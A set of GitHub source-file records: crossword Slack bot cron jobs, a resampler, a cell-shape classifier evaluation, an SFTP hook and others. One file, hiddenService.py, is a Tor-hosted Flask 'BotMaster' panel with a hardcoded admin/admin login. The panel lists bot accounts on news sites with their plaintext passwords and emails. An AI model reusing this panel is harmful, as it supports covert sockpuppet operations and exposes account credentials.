no\n if lastcomment.get('@id') is None:\n logger.info(\"case \" + case + \", empty\")\n continue\n # notify is a list, default value [\"Associate\"]\n # check if the Type that posted the comment is matching the deired one\n if lastcomment.get('createdByType') in notify:\n # the comment is matching, exiting from the loop\n logger.info(\"case \" + case + \", found comment id \" + lastcomment[\"@id\"])\n break\n else:\n # extract the next comment from the structure and restart the loop\n logger.debug(\"case \" + case + \", NOT suitable comment id \" + lastcomment[\"@id\"])\n # This exception means that there are no further comments in the iter\n except StopIteration:\n logger.info(\"case \" + case + \", no suitable comments has been found, exiting from the function\")\n return None\n # a general exception handler\n except Exception as e:\n logger.error(\"case \" + case + \", Exception parsing the comments, error:\\n\" + repr(e) + \"\\ncomments array:\\n\" + repr(comments) + \"\\nlastcomment parsed:\\n\" + repr(lastcomment))\n\n # create the return value\n complete_case = case_dict['case']\n complete_case['lastcomment'] = lastcomment\n\n return complete_case\n\n\ndef rhquery(auth_user, auth_pass, url):\n \"\"\"\n Do the effective query to Red Hat Customer Portal, and retrieve the output\n The result xml will be returned\n \"\"\"\n # If you would like to request Authorization header for Digest Authentication,\n # replace HTTPBasicAuthHandler object to HTTPDigestAuthHandler\n passman = urllib.request.HTTPPasswordMgrWithDefaultRealm()\n passman.add_password(None, url, auth_user, auth_pass)\n authhandler = urllib.request.HTTPBasicAuthHandler(passman)\n opener = urllib.request.build_opener(authhandler)\n urllib.request.install_opener(opener)\n\n # get the case xml\n try:\n res = urllib.request.urlopen(url)\n except urllib.error.HTTPError as e:\n raise HTTPLoginFailed(auth_user)\n except Exception as e:\n logger.exception(repr(message) + repr(e))\n res_body = res.read()\n\n return res_body\n","repo_name":"Rocco83/tickets-pushbot","sub_path":"rhapi.py","file_name":"rhapi.py","file_ext":"py","file_size_in_byte":10295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33932073839","text":"\n\nimport re\n\ndef min_and_max(iterable):\n iterator = iter(iterable)\n\n # Assumes at least two items in iterator\n minim, maxim = sorted((next(iterator), next(iterator)))\n\n for item in iterator:\n if item < minim:\n minim = item\n elif item > maxim:\n maxim = item\n\n return (minim, maxim)\n\n\nwith open('gen_20', 'r') as f:\n g = (re.search(r'Fitness: [-+]?[0-9]*\\.?[0-9]*',line,re.I) for line in f) \n values = (float(v.group(1)) for v in g)\n minim, maxim = min_and_max(values)\n\nprint(maxim)\nprint(minim)","repo_name":"sanchitanand/SnakeNeuralNetworks","sub_path":"fitness_finder.py","file_name":"fitness_finder.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22230562986","text":"from django_cron import CronJobBase, Schedule\nfrom django.utils import timezone\n\nfrom datetime import timedelta\n\nfrom crossbot.util import comma_and\nfrom crossbot.models import MiniCrosswordTime, CBUser\nfrom crossbot.slack.api import post_message\nimport crossbot.predictor as predictor\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass ReleaseAnnouncement(CronJobBase):\n schedule = Schedule(run_at_times=['15:00', '19:00'])\n code = 'crossbot.release_announcement'\n\n def should_run_now(self, time):\n if time.isoweekday() in (6, 7): # It's Saturday or Sunday\n return 14 <= time.hour <= 15\n else:\n return 18 <= time.hour <= 19\n\n def format_message(self, announce_data):\n msgs = ['Good evening crossworders!']\n msgs += [\n '{u} is on a {n}-day win streak! {emoji}'.format(\n u=u, n=len(streak), emoji=':fire:' * len(streak)\n ) for u, streak in announce_data['streaks']\n ]\n\n # now add the other winners\n also = ' also' if announce_data['streaks'] else ''\n if announce_data['winners_today']:\n msgs.append(\n comma_and(announce_data['winners_today']) + also + ' won.'\n )\n if announce_data['winners_yesterday']:\n msgs.append(\n comma_and(announce_data['winners_yesterday']) + also +\n ' won yesterday.'\n )\n if announce_data['overperformers']:\n users = [\n u + (\n \" \" + \":chart_with_upwards_trend:\" * int(-i)\n if i <= -1 else \"\"\n ) for u, i in announce_data['overperformers']\n ]\n msgs.append(comma_and(users) + ' did really well today!')\n if announce_data['difficulty'] > 1:\n diff = int(announce_data['difficulty'])\n msgs.append(\"Oof, that was a tough mini! \" + diff * \":open_mouth:\")\n msgs.append(\"Play tomorrow's:\")\n for game in announce_data['links']:\n msgs.append(\"{} : {}\".format(game, announce_data['links'][game]))\n\n return '\\n'.join(msgs)\n\n def do(self):\n now = timezone.localtime()\n if self.should_run_now(now):\n announce_data = MiniCrosswordTime.announcement_data(now)\n message = self.format_message(announce_data)\n # TODO dont hardcode\n channel = 'C58PXJTNU'\n response = post_message(channel, {'text': message})\n return \"Ran release announcement at {}\\n{}\".format(now, message)\n return \"Did not run release announcement at {} (hour={})\".format(\n now, now.hour\n )\n\n\nclass MorningAnnouncement(CronJobBase):\n schedule = Schedule(run_at_times=['08:30'])\n code = 'crossbot.morning_announcement'\n\n def format_message(self, announce_data):\n msgs = ['Good morning crossworders!']\n\n msgs += [\n '{u} is currently on a {n}-day win streak! {emoji}'.format(\n u=u, n=len(streak), emoji=':fire:' * len(streak)\n ) for u, streak in announce_data['streaks']\n ]\n\n # now add the other winners\n also = ' also' if announce_data['streaks'] else ''\n if announce_data['winners_today']:\n is_are = 'are' if len(announce_data['winners_today']) > 1 else 'is'\n msgs.append(\n '{} {}{} winning'.format(\n comma_and(announce_data['winners_today']), is_are, also\n )\n )\n if announce_data['winners_yesterday']:\n msgs.append(\n comma_and(announce_data['winners_yesterday']) + also +\n ' won yesterday.'\n )\n msgs.append(\"Think you can beat them? Play today's:\")\n for game in announce_data['links']:\n msgs.append(\"{} : {}\".format(game, announce_data['links'][game]))\n\n return '\\n'.join(msgs)\n\n def do(self):\n now = timezone.localtime()\n announce_data = MiniCrosswordTime.announcement_data(now)\n message = self.format_message(announce_data)\n # TODO dont hardcode\n channel = 'C58PXJTNU'\n response = post_message(channel, {'text': message})\n return \"Ran morning announcement at {}\\n{}\".format(now, message)\n\n\nclass Predictor(CronJobBase):\n schedule = Schedule(run_every_mins=60)\n code = 'crossbot.predictor.infer'\n\n def do(self):\n data = predictor.data()\n fit = predictor.fit(data, quiet=True)\n model = predictor.extract_model(data, fit)\n predictor.save(model)\n historic, dates, users, params = model\n return \"Ran the predictor at {}\".format(params.when_run)\n\n\nclass SlacknameUpdater(CronJobBase):\n schedule = Schedule(run_at_times=['2:00'])\n code = 'crossbot.update_slacknames'\n\n def do(self):\n now = timezone.localtime()\n CBUser.update_slacknames()\n return \"Updated slack_users at {}\".format(now)\n","repo_name":"mwillsey/crossbot","sub_path":"crossbot/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"81"} +{"seq_id":"13076466008","text":"import pandas as pd\nimport numpy as np\nimport scipy.interpolate\n\nclass SimpleAcceptReject() :\n\n def __init__(self,\n targetDistData,\n sampleDistData,\n numBins,\n targetColumnName,\n sampleColumnName,\n rejectionEfficiency=10) :\n\n self.distData = {'target' : targetDistData if isinstance(targetDistData, pd.DataFrame) else None,\n 'sample' : sampleDistData if isinstance(sampleDistData, pd.DataFrame) else None }\n\n self.columnName = {'target' : targetColumnName if isinstance(targetColumnName, str) else None,\n 'sample' : sampleColumnName if isinstance(sampleColumnName, str) else targetColumnName }\n\n self.distHisto = {'target' : None, 'sample' : None}\n self.distHistoBins = {'target' : None, 'sample' : numBins if isinstance(numBins, int) else None }\n\n self.distFrame = {'target' : None, 'sample' : None}\n self.distSpline = {'target' : None, 'sample' : None}\n\n self.pdfFrameColNames = ['density', 'bin_low_edge', 'bin_high_edge', 'bin_centre']\n\n self.resampledDistFrame = None\n\n self.rejectionEfficiency = rejectionEfficiency\n\n def genProbDist(self, key) :\n print ('Generating probability disribution for {}...'.format(key))\n self.distHisto[key] = np.histogram(self.distData[key][self.columnName[key]].values,\n bins=self.distHistoBins[key],\n density = True)\n self.distFrame[key] = pd.DataFrame([(*zipped, 0.5*(zipped[1]+zipped[2])) for zipped in zip(self.distHisto[key][0], self.distHisto[key][1][0:-1], self.distHisto[key][1][1:])],\n columns=self.pdfFrameColNames)\n self.distSpline[key] = scipy.interpolate.UnivariateSpline(self.distFrame[key]['bin_centre'].values, self.distFrame[key]['density'].values, s=0)\n if key == 'sample' :\n self.distHistoBins['target'] = self.distHisto[key][1]\n\n def genResampledDistribution(self) :\n print ('Generating resampled distribution...')\n while len(self.resampledDistFrame.index) < len(self.distData['target'].index) :\n # select a random sample of rows from the illustris dataset (select more than we need)\n fullSample = self.distData['sample'].sample(1000)\n # generate the same number of random uniform variates\n uniformVariates = np.random.uniform(size=1000)\n # generate pdf values for the stellar masses corresponding to each of the samples\n targetPdfVals = self.distSpline['target'](fullSample[self.columnName['sample']])\n samplePdfVals = self.distSpline['sample'](fullSample[self.columnName['sample']])\n pdfRatioVals = targetPdfVals/(self.rejectionEfficiency*samplePdfVals)\n # select only those rows of the sample that fulfil the acceptance criterion\n filteredSample = fullSample[uniformVariates <= pdfRatioVals]\n self.resampledDistFrame = pd.concat([self.resampledDistFrame,filteredSample], ignore_index=True)\n print ('Done.')\n\n def getResampledDataset(self) :\n # initialization of probability distributions\n for key in ['sample', 'target'] :\n if self.distData[key] is not None and self.columnName[key] is not None and self.distHistoBins[key] is not None :\n self.genProbDist(key)\n # initialization of output resampled distribution\n self.resampledDistFrame = pd.DataFrame(columns=self.distData['target'].columns)\n self.genResampledDistribution()\n return self.resampledDistFrame\n","repo_name":"AstroZooMin/HughDickinsonMisc","sub_path":"SloanIllustrisNotebooks/PandasResampling.py","file_name":"PandasResampling.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"70710383305","text":"import os\nimport shutil\nfrom docutils.nodes import table, author\nfrom hgext.fsmonitor.pywatchman import client\n\nfrom db import cryptoDB\n\n\nfrom stem.control import Controller\nfrom flask import Flask, flash, redirect, render_template, request, session, abort\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n return 'Hi BotMaster:) Logout'\n\ndef show_tables():\n tables = {'elmundo', 'eldiario'}\n out = \"\"\n out += \"

Bot list

\"\n out += ''\n out += '

Hi BotMaster! Logout

'\n\n for table_name in tables:\n rows = cryptoDB.get_all_users(table_name)\n out += \"

Bots created in \" + table_name + \"

\"\n out += '
'\n out += ''\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n out += \" \"\n\n for row in rows:\n out += \"\"\n for i in range(0,4):\n out += \"\"\n out += \"\"\n out += \" \"\n out += \"
User IDUsernamePwdE-mail
\" + str(row[i]) + \"
\"\n out += \"
\"\n\n return out\n\n# Route for handling the login page logic\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != 'admin' or request.form['password'] != 'admin':\n error = 'Invalid Credentials. Please try again.'\n else:\n return show_tables()\n return render_template('login.html', error=error)\n\n\n@app.route(\"/logout\")\ndef logout():\n def logout():\n session['logged_in'] = False\n\n return index()\n\nprint(' * Connecting to tor')\n\nwith Controller.from_port() as controller:\n controller.authenticate()\n\n # All hidden services have a directory on disk. Lets put ours in tor's data\n # directory.\n\n hidden_service_dir = os.path.join(controller.get_conf('DataDirectory', '/tmp'), 'hello_world')\n\n # Create a hidden service where visitors of port 80 get redirected to local\n # port 5000 (this is where Flask runs by default).\n\n print(\" * Creating our hidden service in %s\" % hidden_service_dir)\n result = controller.create_hidden_service(hidden_service_dir, 80, target_port = 5000)\n\n # The hostname is only available when we can read the hidden service\n # directory. This requires us to be running with the same user as tor.\n\n if result.hostname:\n print(\" * Our service is available at %s, press ctrl+c to quit\" % result.hostname)\n else:\n print(\" * Unable to determine our service's hostname, probably due to being unable to read the hidden service directory\")\n\n try:\n app.run()\n finally:\n # Shut down the hidden service and clean it off disk. Note that you *don't*\n # want to delete the hidden service directory if you'd like to have this\n # same *.onion address in the future.\n\n print(\" * Shutting down our hidden service\")\n controller.remove_hidden_service(hidden_service_dir)\n shutil.rmtree(hidden_service_dir)\n","repo_name":"kikoas1995/smartBot","sub_path":"hiddenService.py","file_name":"hiddenService.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"74286298503","text":"\"\"\"\n Describe what we need to do before commit is complete\n\"\"\"\n\n\nfrom pathlib import Path\nimport subprocess\nimport sys\nfrom sftp_uploader.services.applications.sftp_uploader import update_files\n\nfrom sftp_uploader.services.exceptions.pre_commit_actions import CannotActivatePythonVenv\n\n\ndef setup_env():\n\n activate_this_script = 'venv/bin/activate'\n\n if Path(activate_this_script).absolute().exists():\n activate_script = f\"{activate_this_script}\"\n command = f\"source {activate_script}; {sys.executable}\"\n subprocess.run(command, \n shell=True,\n check=True)\n\n else:\n raise CannotActivatePythonVenv\n\n\ndef pre_commit_actions():\n setup_env()\n update_files()\n\n\n","repo_name":"moonvent/sftp_uploader","sub_path":"sftp_uploader/applications/pre_commit_actions.py","file_name":"pre_commit_actions.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36212276546","text":"#!/usr/bin/env python\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport re\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\nfrom sklearn.neighbors import KernelDensity\r\n\r\nVERSION = '1.0.0'\r\n\r\nprint('\\ncytoShapeNet v.' + VERSION)\r\nprint('© 2018-2020 Dr. Stephan Quint & Konrad Hinkelmann')\r\nprint('info@cytoshape.net\\n\\n')\r\n\r\n# make use of longer loading imports for displaying the info text\r\nimport seaborn as sns\r\nfrom keras.models import model_from_json\r\n\r\n\r\n__doc__ = 'Evaluation part of cytoShapeNet' \\\r\n '===============================' \\\r\n '' \\\r\n 'This script uses the neural networks created in the previous training part to predict and plot cell data ' \\\r\n 'from \"PATH\".'\r\n__author__ = 'Stephan Quint, Konrad Hinkelmann'\r\n__copyright__ = 'Copyright © 2018-2020, cytoShapeNet'\r\n__credits__ = ['Stephan Quint, Konrad Hinkelmann, Greta Simionato, Revaz Chachanidze, Paola Bianchi, Elisa Fermo,'\r\n 'Richard van Wijk, Christian Wagner, Lars Kaestner, Marc Leonetti']\r\n__license__ = 'GPL'\r\n__version__ = VERSION\r\n__email__ = 'info@cytoshape.net'\r\n\r\n\r\n# constants\r\nALT_LABELS = True\r\nALT_LABEL_VALUES = ['SDE', 'CC', 'KE', 'KN', 'ML', 'AC', 'U']\r\nCONFUSION_THRESHOLD = 0.75\r\n\r\n# this script will be called from the root directory .bat file, where the \"PATH\", \"NN_PATH\" folders are located\r\nDATA_PATH = 'data\\\\evaluation\\\\'\r\nNN_PATH = 'nn\\\\'\r\nFONT = {'fontname': 'DejaVu Sans', 'fontsize': '9'}\r\nFONT_SMALL = {'fontname': 'DejaVu Sans', 'fontsize': '7'}\r\nFONT_SMALL_ITALIC = {'fontname': 'DejaVu Sans', 'fontsize': '7', 'fontstyle': 'italic'}\r\nPLOT_COLORS = ['darkblue', 'darkred', 'darkgreen', 'darkorange']\r\n\r\n\r\n# forcing Keras / Tensorflow to run on CPU to get reproducible results\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\r\n\r\nsns.set_style('darkgrid', {'axes.facecolor': '.9'})\r\nplot_color_idx = 0\r\nprocessed_cell_count = 0\r\n\r\n\r\ndef file_to_list(filename):\r\n file_handle = open(filename, 'r')\r\n out_list = []\r\n for line in file_handle.readlines():\r\n out_list.append(line.replace('\\n', ''))\r\n file_handle.close()\r\n return out_list\r\n\r\n\r\ndef mm2inch(value):\r\n return value / 25.4\r\n\r\n\r\ndef find_nearest(array, value):\r\n array = np.asarray(array)\r\n nearest_idx = (np.abs(array - value)).argmin()\r\n return array[nearest_idx]\r\n\r\n\r\ndef convert_digits(text):\r\n if text.isdigit():\r\n text = int(text)\r\n return text\r\n\r\n\r\ndef sort_alphanumerically(input_list):\r\n alphanum_key = lambda key: [convert_digits(c) for c in re.split('([0-9]+)', key)]\r\n return sorted(input_list, key=alphanum_key)\r\n\r\n\r\n\r\nfor directory in os.listdir(DATA_PATH):\r\n data_directory = DATA_PATH + directory + '\\\\'\r\n if os.path.isdir(data_directory):\r\n # compute all folders (separately) in the \"DATA_PATH\" directory\r\n data_collection = {}\r\n # different plot color for each folder\r\n plot_color = PLOT_COLORS[plot_color_idx % len(PLOT_COLORS)]\r\n # load all data from data_directory\r\n for root, directories, files in os.walk(data_directory):\r\n for file in files:\r\n if file.endswith('.dat'):\r\n # remove 'data\\'\r\n input_folder = os.path.basename(root)\r\n # load data\r\n print('Loading: ' + os.path.join(root, file))\r\n data = np.loadtxt(os.path.join(root, file), skiprows=1)\r\n # normalize data\r\n data /= np.max(abs(data))\r\n if not (input_folder in data_collection):\r\n data_collection[input_folder] = []\r\n data_collection[input_folder].append(data)\r\n\r\n # load classification NN\r\n json_file = open(NN_PATH + 'classification_NN.json', 'r')\r\n classification_model = model_from_json(json_file.read())\r\n json_file.close()\r\n classification_model.load_weights(NN_PATH + 'classification_NN.h5')\r\n\r\n # load regression NN\r\n json_file = open(NN_PATH + 'regression_NN.json', 'r')\r\n regression_model = model_from_json(json_file.read())\r\n json_file.close()\r\n regression_model.load_weights(NN_PATH + 'regression_NN.h5')\r\n\r\n labels = file_to_list(NN_PATH + 'class_labels.txt')\r\n all_SDE_collections = []\r\n\r\n SDE_densities_df = pd.DataFrame()\r\n SDE_histograms_df = pd.DataFrame()\r\n classes_histograms_df = pd.DataFrame()\r\n\r\n # sort according to windows\r\n data_collection_keys = sort_alphanumerically(data_collection.keys())\r\n\r\n SDE_cell_count_collection = []\r\n for subject in data_collection_keys:\r\n print('\\n\\nPredicting cells of ' + subject, end='', flush=True)\r\n histogram = {key: 0 for key in labels}\r\n SDE_data_collection = []\r\n unknown = 0\r\n for idx in range(len(data_collection[subject])):\r\n print('.', end='', flush=True)\r\n data = np.asarray([data_collection[subject][idx]])\r\n prediction = classification_model.predict(data)\r\n processed_cell_count += 1\r\n if np.max(prediction) < CONFUSION_THRESHOLD:\r\n unknown += 1\r\n continue\r\n\r\n result = [np.argmax(y) for y in prediction][0]\r\n histogram[labels[result]] += 1\r\n\r\n if labels[result] == 'SDE shapes':\r\n SDE_data_collection.append(data)\r\n\r\n # normalize classes histogram\r\n histogram['unknown'] = unknown\r\n classes_hist_values_norm = list(histogram.values()) / np.sum(list(histogram.values()))\r\n\r\n # SDE distribution\r\n SDE_results = []\r\n for idx in range(len(SDE_data_collection)):\r\n print('.', end='', flush=True)\r\n SDE_prediction = regression_model.predict(SDE_data_collection[idx])\r\n SDE_results.append(SDE_prediction)\r\n\r\n subject = subject.replace('_', ' ')\r\n\r\n print('\\n\\nAnalyzing cells of ' + subject, flush=True)\r\n # probability density estimation\r\n x_grid = np.linspace(-1.25, 1.25, 1251)[:, np.newaxis]\r\n kde = KernelDensity(bandwidth=0.025, kernel='gaussian')\r\n SDE_results = np.asarray(np.squeeze(SDE_results)).reshape(-1, 1)\r\n kde.fit(SDE_results)\r\n log_prob = kde.score_samples(x_grid)\r\n kde_dist = np.exp(log_prob)\r\n\r\n all_SDE_collections.append(np.exp(log_prob))\r\n ppath = subject.replace('\\\\', '_')\r\n dest_path_SDE_raw = data_directory + 'SDE_raw_' + ppath + '.csv'\r\n np.savetxt(dest_path_SDE_raw, SDE_results)\r\n\r\n # identifier = folder prefix (C1, C2, ...)\r\n identifier = subject.split(' ')[0]\r\n SDE_densities_df[identifier] = kde_dist\r\n SDE_hist, bins = np.histogram(SDE_results, bins=np.linspace(-1.25, 1.25, 126), density=True)\r\n SDE_hist = np.append(SDE_hist, [0])\r\n SDE_histograms_df[identifier] = SDE_hist\r\n classes_histograms_df[identifier] = classes_hist_values_norm\r\n\r\n SDE_cell_count_collection.append(len(SDE_results))\r\n \r\n print('\\nExporting CSV files for \"' + directory + '\"')\r\n # append independent variables to dataframes\r\n SDE_densities_df['x'] = x_grid\r\n SDE_histograms_df['bins'] = bins\r\n classes_histograms_df['bins'] = histogram.keys()\r\n\r\n # save_dataframes to csv files\r\n dest_path_SDE_densities = data_directory + 'SDE_densities.csv'\r\n dest_path_SDE_histograms = data_directory + 'SDE_histograms.csv'\r\n dest_path_classes_histograms = data_directory + 'classes_histograms.csv'\r\n\r\n SDE_densities_df.to_csv(dest_path_SDE_densities, index=False)\r\n SDE_histograms_df.to_csv(dest_path_SDE_histograms, index=False)\r\n classes_histograms_df.to_csv(dest_path_classes_histograms, index=False)\r\n\r\n print('Generating line plot for \"' + directory + '\"')\r\n subject_names = SDE_densities_df.head(0).columns\r\n # minimum of \"1\" for reasonable visualisation of the plot height when using a single input folder\r\n subject_count = len(subject_names) - 1\r\n height_count = max(subject_count, 2)\r\n\r\n height = mm2inch(22 * height_count + 5)\r\n fig, axes = plt.subplots(1, 2, figsize=(mm2inch(180), height))\r\n\r\n subscale = 7\r\n y_offset = subscale * (subject_count-1)\r\n ax1 = plt.subplot(1, 2, 2)\r\n\r\n x_grid = np.linspace(-1.25, 1.25, 1251, dtype=np.single)\r\n\r\n for idx in range(subject_count):\r\n bardata = classes_histograms_df[subject_names[idx]]\r\n plt.plot(x_grid, SDE_densities_df[subject_names[idx]] + y_offset, color=plot_color, linewidth=0.5)\r\n plt.fill_between(x_grid, y_offset, SDE_densities_df[subject_names[idx]] + y_offset, alpha=0.2,\r\n color=plot_color)\r\n subject_id = subject_names[idx]\r\n subject_id = subject_id.split(' ')[0]\r\n\r\n SDE_cell_count = SDE_cell_count_collection[idx]\r\n\r\n plt.text(0.65, y_offset + 0.65*subscale, 'total: %d' % SDE_cell_count, **FONT_SMALL)\r\n\r\n # calculate expect value\r\n density = SDE_densities_df[subject_names[idx]]\r\n res = x_grid[1]-x_grid[0]\r\n expect_val = np.trapz(np.multiply(density, x_grid), dx=res)\r\n std_dev = np.sqrt(np.trapz(np.multiply(np.power(np.subtract(x_grid, expect_val), 2), density), dx=res))\r\n\r\n for jdx in range(len(density)):\r\n probability = np.trapz(density[0:jdx], x_grid[0:jdx])\r\n if probability >= 0.025:\r\n prob_0025_x_val = x_grid[jdx]\r\n jdx_save = jdx\r\n break\r\n\r\n for jdx in range(len(density)):\r\n probability = np.trapz(density[jdx_save:jdx+jdx_save], x_grid[jdx_save:jdx+jdx_save])\r\n if probability >= 0.95:\r\n prob_0975_x_val = x_grid[jdx+jdx_save]\r\n break\r\n\r\n lb = np.where(x_grid == find_nearest(x_grid, prob_0025_x_val))[0][0]\r\n ub = np.where(x_grid == find_nearest(x_grid, prob_0975_x_val))[0][0]\r\n inner_integral = np.trapz(density[lb:ub], x_grid[lb:ub], dx=res)\r\n ax1.plot([expect_val, expect_val], [y_offset, y_offset + 0.9 * subscale], '--', linewidth=0.5,\r\n color=plot_color)\r\n ax1.add_patch(patches.Rectangle((x_grid[lb], y_offset), (x_grid[ub]-x_grid[lb]), 0.9 * subscale,\r\n facecolor='black', fill=True, alpha=0.1, linewidth=0.0))\r\n plt.text(-1.2, y_offset + 0.65 * subscale, '$\\mu$ = %.2f' % expect_val, **FONT_SMALL)\r\n plt.text(-1.2, y_offset + 0.45 * subscale, 'CI$_{0.95}$ = [%.2f,%.2f]' % (x_grid[lb], x_grid[ub]),\r\n **FONT_SMALL)\r\n\r\n mutation_label_filepath = data_directory + 'mutation_labels.txt'\r\n if os.path.exists(mutation_label_filepath):\r\n mutation_labels = []\r\n mutation_label_file = open(mutation_label_filepath)\r\n items = mutation_label_file.readlines()\r\n for item in items:\r\n mutation_labels.append(item.split('\\t')[1].strip())\r\n plt.text(-1.2, y_offset + 0.25 * subscale, mutation_labels[idx], **FONT_SMALL_ITALIC)\r\n y_offset = y_offset - subscale\r\n\r\n plt.xlim(np.min(x_grid), np.max(x_grid))\r\n plt.ylim(-subscale*0.1, subscale * subject_count + subscale / 4)\r\n plt.yticks(np.linspace(0, subscale*(subject_count-1), subject_count), [])\r\n SDE_label_list = []\r\n SDE_labels = [-1.00, -0.67, -0.33, 0.00, 0.33, 0.67, 1.00]\r\n SDE_labels_custom = ['SP', 'ST II', 'ST I', 'D', 'E I', 'E II', 'E III']\r\n for idx in range(len(SDE_labels_custom)):\r\n SDE_label_list.append('%.2f\\n' % (SDE_labels[idx]) + SDE_labels_custom[idx])\r\n plt.xticks(SDE_labels, **FONT_SMALL)\r\n ax = plt.gca()\r\n ax.set_xticklabels(SDE_label_list, **FONT_SMALL)\r\n\r\n plt.yticks(np.linspace(0, subscale*(subject_count-1), subject_count), [])\r\n plt.ylabel('probability density', **FONT)\r\n plt.xlabel('SDE distribution', **FONT)\r\n ax1.xaxis.set_label_position('top')\r\n plt.grid(True)\r\n\r\n ax2 = plt.subplot(1, 2, 1)\r\n y_offset = subscale * (subject_count-1)\r\n\r\n print('Generating bar plot for \"' + directory + '\"')\r\n for idx in range(subject_count):\r\n bardata = classes_histograms_df[subject_names[idx]]\r\n for jdx in range(len(bardata)):\r\n if jdx == 0:\r\n color = plot_color\r\n else:\r\n color = 'black'\r\n ax2.add_patch(patches.Rectangle((jdx+0.75, y_offset), 0.5, bardata[jdx] * subscale * 0.9,\r\n edgecolor=color, facecolor='white', linewidth=0.5))\r\n ax2.add_patch(patches.Rectangle((jdx+0.75, y_offset), 0.5, bardata[jdx] * subscale * 0.9,\r\n edgecolor=color, facecolor=color, fill=True, alpha=0.2, linewidth=0.5))\r\n plt.text(jdx + 0.75 + 0.14, y_offset + 1, '%.3f' % bardata[jdx], **FONT_SMALL, rotation=90)\r\n subject_id = subject_names[idx]\r\n subject_id = subject_id.split(' ')[0]\r\n total_cell_count = str(len(data_collection[data_collection_keys[idx]]))\r\n plt.text(0.1 + 6, y_offset + 0.65 * subscale, 'total: ' + total_cell_count, **FONT_SMALL)\r\n plt.text(0.1, y_offset + 0.5, subject_id, **FONT_SMALL)\r\n y_offset = y_offset - subscale\r\n\r\n plt.xlim(0, len(bardata) + 1)\r\n if ALT_LABELS:\r\n plt.xticks([1, 2, 3, 4, 5, 6, 7], ALT_LABEL_VALUES, **FONT_SMALL)\r\n else:\r\n plt.xticks([1, 2, 3, 4, 5, 6, 7], histogram.keys(), rotation=90, **FONT_SMALL)\r\n plt.ylim(-subscale*0.1, subscale * subject_count + subscale / 4)\r\n plt.yticks(np.linspace(0, subscale * (subject_count-1), subject_count), [])\r\n plt.yticks(np.linspace(0, subscale * (subject_count-1), subject_count), [])\r\n plt.ylabel('probability', **FONT)\r\n ax2.xaxis.set_label_position('top')\r\n plt.xlabel('classification', **FONT)\r\n\r\n plt.tight_layout()\r\n plt.savefig(data_directory + '\\\\evaluation_results.pdf')\r\n plot_color_idx += 1\r\n\r\nprint('\\nProcessed ' + str(processed_cell_count) + ' cells')\r\nplt.show()\r\n","repo_name":"Dynamicist-handa/ML_CytoMorph","sub_path":"src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":14686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69967212424","text":"from dynaconf import Dynaconf\n\nsettings = Dynaconf(\n envvar_prefix=\"AGING_REPORT\",\n settings_files=[\"settings.toml\", \".secrets.toml\"],\n environments=True,\n)\n\n# `envvar_prefix` = export envvars with `export DYNACONF_FOO=bar`.\n# `settings_files` = Load this files in the order.\n","repo_name":"department-of-general-services/priority-vendor-aging-report","sub_path":"app/src/dgs_fiscal/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"34019829533","text":"import os\nimport pandas as pd\nimport numpy as np\nimport prepare_data\nfrom skimage import transform\nfrom numba import jit\nfrom multiprocessing import Pool\n\n\nif __name__ == '__main__':\n pd.options.display.width = 200\n pd.options.display.max_columns = 20\n\n test_mode = True\n kernel_mode = False\n if kernel_mode:\n base_dir = os.path.join('/kaggle', 'input', 'understanding_cloud_organization')\n output_dir_base = os.path.join('/kaggle', 'working')\n else:\n base_dir = 'data'\n output_dir_base = 'data'\n\n num_calibration_samples = 500\n num_testing_samples = 100\n num_training_samples = len(os.listdir(os.path.join(base_dir, 'train_images'))) - num_calibration_samples - num_testing_samples\n\n def get_im_arr(folder, folder_list, save_name):\n args = [(folder, f) for f in folder_list]\n with Pool() as p:\n res = p.starmap_async(prepare_data.process_one_image, args)\n im_arr = res.get()\n data = np.concatenate([x[0][np.newaxis, :, :, np.newaxis] for x in im_arr], axis=0)\n np.save(os.path.join(output_dir_base, save_name), data)\n names = [x[1] for x in im_arr]\n pd.DataFrame({'names': names}).to_csv(os.path.join(output_dir_base, '{}.csv'.format(save_name)), index=False,\n header=True)\n\n\n train_folder = os.path.join(base_dir, 'train_images')\n train_folder_list = os.listdir(train_folder)[:num_training_samples]\n get_im_arr(train_folder, train_folder_list, 'train_data')\n calib_folder_list = os.listdir(train_folder)[-(num_calibration_samples + num_testing_samples):-num_testing_samples]\n get_im_arr(train_folder, calib_folder_list, 'calib_data')\n test_folder_list = os.listdir(train_folder)[-num_testing_samples:]\n get_im_arr(train_folder, test_folder_list, 'test_data')\n submit_folder = os.path.join(base_dir, 'test_images')\n submit_folder_list = os.listdir(submit_folder)\n get_im_arr(submit_folder, submit_folder_list, 'submit_data')\n\n\n @jit\n def add_label(pixel_arr, label_arr_shape, label):\n label_arr = np.zeros(label_arr_shape)\n height, width = label_arr.shape\n for j in range(len(pixel_arr) // 2):\n start, length = pixel_arr[2 * j] - 1, pixel_arr[2 * j + 1]\n for k in range(length):\n p = start + 